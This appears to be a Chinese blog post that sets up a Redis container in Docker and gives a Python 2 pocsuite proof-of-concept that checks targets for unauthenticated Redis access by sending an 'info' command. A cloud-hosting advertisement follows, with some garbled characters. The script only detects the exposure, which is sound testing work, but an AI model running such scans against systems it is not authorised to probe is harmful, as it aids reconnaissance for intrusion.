docker search redis
docker pull redis
docker images
docker run -p 6379:6379 -d redis
-p
將容器的6379端口映射到主機的6379端口。
-d
將容器后臺運行。
docker ps
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
from pocsuite.utils import register
from pocsuite.poc import Output, POCBase
class TestPOC(POCBase):
vulID = '0'
version = '1'
author = 'nw01f'
vulDate = '2018-10-23'
createDate = '2018-10-23'
updateDate = '2018-10-23'
references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/']
name = 'Redis Unauthorized'
appPowerLink = 'https://www.redis.io'
appName = 'Redis'
appVersion = 'All'
vulType = 'Unauthorized'
desc = '''
redis Unauthorized
'''
samples = ['']
def _verify(self):
result = {}
payload = '\x69\x6e\x66\x6f\x0d\x0a' ## info/r/n
s = socket.socket()
socket.setdefaulttimeout(4)
try:
host = self.url.split(':')[1].strip('/')
if len(self.url.split(':')) > 2:
port = int(self.url.split(':')[2].strip('/'))
else:
port = 6379
s.connect((host, port))
s.send(payload)
data = s.recv(1024)
if data and 'redis_version' in data:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
result['VerifyInfo']['port'] = port
result['VerifyInfo']['result'] = data[:20]
except Exception as e:
print e
s.close()
return self.parse_attack(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("error")
return output
register(TestPOC)
http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務器15元起步,三天無理由+7*72小時售后在線,公司持有idc許可證,提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢,專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應用場景需求。